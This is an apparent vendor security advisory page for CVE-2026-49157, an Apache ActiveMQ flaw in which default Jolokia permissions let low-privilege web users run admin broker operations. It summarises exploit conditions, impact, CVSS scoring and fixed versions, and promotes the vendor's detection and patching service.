How is CVE-2026-49157 exploited?

Network reachability (required): The Jolokia endpoint is exposed over HTTP/HTTPS, so the attacker must be able to reach the ActiveMQ web console over the network. Authentication (required): Any low-privilege web-login account is sufficient; no administrative credentials are needed to trigger the vulnerable Jolokia operations. Victim interaction (not-required): The attacker makes direct HTTP requests to the Jolokia endpoint and does not need any action from another user. Attack complexity (info): Exploitation is reliable and condition-free; the attacker simply sends well-formed Jolokia operation requests using valid low-privilege credentials.

What is the impact of CVE-2026-49157?

Reads broker internals exposed through Jolokia, including queue names, connection counts, and message metrics that may reveal sensitive operational data. Adds or removes queues on the broker, disrupting application message flows that depend on those queues. Invokes other broker management operations via Jolokia that are intended for administrators, enabling broad configuration tampering. Triggers conditions that crash or degrade the broker service by misusing management operations at scale.

Back to search

HIGHCVE-2026-49157Published 2026-06-01Modified 2026-06-01CNA apache

CVE-2026-49157: Apache ActiveMQ: Authenticated low-privilege Web users retain Jolokia broker-management capability by default

Incorrect Default Permissions vulnerability in Apache ActiveMQ. This issue affects Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. The default Jolokia authorization settings granted non-admin (low-privilege) web-login accounts access to Jolokia operations which allowed executing broker management operations meant for admins such as addQueue and removeQueue. Users are recommended to upgrade to version 6.2.6 or 5.19.7, which fixes the issue.

CVSS v3.1: 8.8
Severity: HIGH
Fixed in: 5.19.7
Affected Products: 1

HarborGuard Analysis

Synopsis

Incorrect default permissions in Apache ActiveMQ allow any authenticated low-privilege web user to access the Jolokia JMX-over-HTTP endpoint and invoke broker management operations reserved for administrators. The vulnerability is reachable over the network and requires only a low-privilege account, with no additional interaction needed. A successful attacker can read sensitive broker state, modify queue configuration (adding or removing queues), and disrupt message delivery. A patched-image rebuild at versions 5.19.7 or 6.2.6 is available on HarborGuard for affected environments.

HarborGuard Coverage

Detection

Detection of CVE-2026-49157 is available across every HarborGuard environment; the CVE is ingested from Apache and NVD feeds within minutes of publication and matched against all customer images, including custom-built ActiveMQ images, in both registry scans and CI pipeline checks.

Available

Triage

HarborGuard scores this CVE at CVSS 8.8 (HIGH) and is capable of weighting that score against each environment's compliance policy to prioritize routing; triage tickets can be directed to the appropriate team inbox within each customer organization based on policy configuration.

Available

Patch

A patched-image rebuild targeting ActiveMQ 5.19.7 or 6.2.6 becomes available in HarborGuard once the fix version is confirmed in the upstream advisory. For customers who opt into auto-remediation, HarborGuard can perform the rebuild, run regression tests, and open a pull request against affected workloads automatically.

Available

Exploit Conditions

Network reachabilityRequired
The Jolokia endpoint is exposed over HTTP/HTTPS, so the attacker must be able to reach the ActiveMQ web console over the network.
AuthenticationRequired
Any low-privilege web-login account is sufficient; no administrative credentials are needed to trigger the vulnerable Jolokia operations.
Victim interactionNot required
The attacker makes direct HTTP requests to the Jolokia endpoint and does not need any action from another user.
Attack complexityDetail
Exploitation is reliable and condition-free; the attacker simply sends well-formed Jolokia operation requests using valid low-privilege credentials.

Blast Radius

Reads broker internals exposed through Jolokia, including queue names, connection counts, and message metrics that may reveal sensitive operational data.
Adds or removes queues on the broker, disrupting application message flows that depend on those queues.
Invokes other broker management operations via Jolokia that are intended for administrators, enabling broad configuration tampering.
Triggers conditions that crash or degrade the broker service by misusing management operations at scale.

How HarborGuard Handles This

Available on HarborGuard: detection for CVE-2026-49157 is active in every ingest cycle, matching images running Apache ActiveMQ versions prior to 5.19.7 (all prior releases) or prior to 6.2.6 (6.0.0 through 6.2.5). A patched-image rebuild at 5.19.7 or 6.2.6 is available for environments running an affected version. For customers who opt into auto-remediation, HarborGuard can rebuild the image, run a regression test suite, and open a pull request against affected workloads; median time from CVE publication to merged patch PR for HIGH-severity issues is around 90 minutes in environments with auto-remediation enabled. Where compliance policy requires manual approval, HarborGuard routes a prioritized triage ticket to the configured team inbox with full context on affected images and suggested remediation steps.

See how HarborGuard automates this

Fix available

5.19.76.2.6

Affected packages

Apache Software Foundation / Apache ActiveMQ
< 5.19.7 (from 0) · < 6.2.6 (from 6.0.0)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

lists.apache.org

Metrics

Get notified

HarborGuard Analysis

Synopsis

HarborGuard Coverage

Exploit Conditions

Blast Radius

How HarborGuard Handles This

Fix available